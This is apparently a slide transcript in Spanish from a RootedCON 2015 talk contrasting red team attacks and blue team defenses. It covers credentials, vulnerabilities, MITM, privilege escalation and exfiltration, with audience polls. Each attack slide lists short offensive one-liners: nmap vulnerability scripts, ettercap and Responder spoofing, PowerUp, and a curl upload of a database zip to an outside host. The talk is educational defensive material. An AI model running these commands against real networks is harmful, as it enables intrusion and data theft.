rooted con 2015 - rojos y azules: dos equipos con dos sabores
TRANSCRIPT
Introducción.
•Modo colaborativo.
• Se introducirá un tema y hacemos encuesta vía web.
•Al acabar vemos las respuestas y opinamos sobre ellas.
• Se espera vuestra participación (!!)
•Para que tenga sentido, vamos haciendo el test todos a la vez.
URL: http://secby.me/redblueteam
Metodología: Assume Breach (Microsoft)
Metodología que da por perdida la primera parte de la batalla, consiste en detectar gaps en las siguientes tácticas, técnicas y procedimientos (TTP):
• Detección de ataques y penetraciones.• Respuesta a los ataques y penetraciones.• Recuperación de la fuga, modificación o compromiso de
información.• Prevención de futuros ataques y penetración.
Red Team.The Red Team is a group of full-time staff within <company> that focuses on breaching client infrastructure, platform and client own tenants and applications. They are the dedicated
adversary (a group of ethical hackers) performing targeted and persistent attacks.
- Microsoft
Objetivo medible mediante:• Tiempo medio para comprometer - Mean Time to Compromise
(MTTC)
• Tiempo medio para escalar privilegios o pwnage - Mean Time to Privilege Escalation or “Pwnage” (MTTP)
Blue Team.The Blue Team is comprised of either a dedicated set of
security responders or members from across the securityincident response, Engineering and Operations organizations.
-Microsoft
Objetivo medible mediante:• Tiempo medio de detección - Mean-Time to Detect (MTTD)
• Tiempo medio de recuperación - Mean-Time to Recovery (MTTR)
Predecir Prevenir Detectar Responder
MTTC/MTTP Top 6 ataques MTTD/MTTR Top 6 defensas
Desde una perspectiva de ejercicio con escenario interno.
Red Top 1/6: Credenciales.• WTF. Lo mismo de siempre, 30 años después.
• Por eso sigue en el Top.
• Ejemplos:• Contraseñas en el Group Policy Preferences.• Contraseñas en los comentarios de un usuario del
directorio activo.• SQL Server sa/<blank> Oracle: SYSTEM/MANAGER• Marzo2015 o similares como contraseña en AD.• Y eso, si no hay un xls con todas las passwords en
una carpeta pública en un file server…
5 mins pwnage:• nmap -p 1433 --script ms-sql-empty-password
Blue Top 1/6: Credenciales.
Soluciones complejas (… por eso sigue en el top …)
• Robustecer “Passfilt.dll” de Windows con aplicación de terceros.
• Sistemas de salto “jumpbox” monitorizados.
• Soluciones de doble factor de autenticación.
• Aplicar acceso 4eyes a contraseñas sensibles / OTP
• “Honeyusers” con usuarios que únicamente ejecutan alertas.
• Monitorización exhaustiva de logins fallidos.
• Gestión de Identidades.
• Políticas de contraseñas, Captchas, bloqueos, etc…
Red Top 2/6: Vulnerabilidades en aplicaciones.• Exploits conocidos o por conocer.
• Ejemplos:• shellshock, heartbleed, jetleak…• Los XP que quedan por ahí muertos.• Java/Flash.• Software de backup.• Webs con RCE/LFI, etc.
5 mins pwnage:• nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139 …• nmap -p 443 --script ssl-heartbleed …• Metasploit …• ./exploit-db.py
Blue Top 2/6: Vulnerabilidades en aplicaciones.
• Arquitectura de red: segmentación de red, reglas en firewall internos.
• Uso de IPS.
• Despliegue automático de parches:• Windows: SCCM/WSUS .
• Linux: Satellite/Spacewalk/Landscape
• chef/puppet/salt, etc
• EMET - Enhanced Mitigation Experience Toolkit.
• Grsecurity.
• Controles en navegación. Ej: alertas con User-Agents específicos de Java.
• Vulnerability Scans y Revisiones de cumplimiento.
Q7: Te encuentras el método DELETE y PUT habilitado en un servidor web.• Respondido: 246 Omitido: 28
Q7: Te encuentras el método DELETE y PUT habilitado en un servidor web.• Respondido: 246 Omitido: 28
Red Top 3/6: Ataques de red.
• Ataques Man In The Middle en sus 300 formas.
• Ejemplos:• ARP Spoofing.
• WPAD Poisoning, LLMNR Poisoning.
• DHCP Spoofing.
• Rogue/Fake AP
5 mins pwnage:• ettercap -T -q -i eth0 -M arp:remote /192.168.1.69/
/192.168.1.1/
• Responder -i 192.168.1.100 -wrf
• ettercap -Tq -M dhcp:/255.255.255.0/192.168.1.1Imagen de: http://www.sternsecurity.com/
Blue Top 3/6: Ataques de red.
• Aplicación de Network Access Control.
• Configuración de Dynamic ARP Inspection.
• Habilitar DHCP Snooping.
• El uso de protocolos cifrados.
• Desactivar IPv6.
• Desactivar Multicast Name Resolution.
• Evitar el uso de WPAD
• Implantar Wireless intrusion detection system
• Segmentación de red.
• Firewall / IPS
Red Top 4/6: Privilegios
• De usuario guarrete a local admin, de local admin a domain admin y de ahí al infinito.
• Ejemplos:• Servicios con permisos incorrectos.• Binarios en local o servidores de ficheros con
permisos incorrectos.• Uso de usuarios de aplicación privilegiados.• Usuarios del dominio con privilegios de Local
Admin.• sudo demasiado permisivo.
5 mins pwnage:• PowerUp.ps1: Invoke-AllChecks• Sticky keys• Kon-Boot
Blue Top 4/6: Privilegios.
• Eliminar acceso al cmd y powershell.
• Meter en el registro una entrada no aceptando el EULA de sysinternals (y proteger sus permisos).
• Activar UAC/Firewall de Windows.
• Permisos en las tareas programadas.
• Uso de listas blancas de binarios, comprobación de firmas, AppLocker, etc.
• Eliminar acceso a USB/CD (bios)
• Cifrar contenido del disco duro, bitlocker y similares.
Red Top 5/6: In/Exfiltración
• Introducir o exportar información de la red. Documentos, herramientas o cualquier otro tipo de fichero.
• Ejemplos:• Mediante HTTP por el proxy.
• Correos electrónicos.
• Túneles DNS.
• IM
5 mins pwnage:• curl --data-binary @mi_bbdd.zip http://muaha.net/upload.php
Blue Top 5/6: In/Exfiltración.
• Inspección de SSL en navegación.• Bloqueo de categorías tipo hacking, malware, etc.• Bloquear la descarga de ejecutables y derivados.• En caso de dominios no conocidos, página de bienvenida.• Bloqueo de dominios jóvenes, Ej <20 días.• Limitar peticiones POST, Ej cabeceras mayores de 50kb.• No resolver DNS de Internet desde las workstation.• Firmas específicas en IPS para túneles y otros covert channels.• Bloqueo o cifrado de USB.• Antivirus.
Q10: ¿Cuál es tu método favorito para mandar documentación confidencial a casa?• Respondido: 241 Omitido: 33
Q10: ¿Cuál es tu método favorito para mandar documentación confidencial a casa?• Respondido: 241 Omitido: 33
Gracias.Alejandro Ramos – Marzo 2015
www.securitybydefault.com / @aramosf
http://secby.me/redbluerespuestas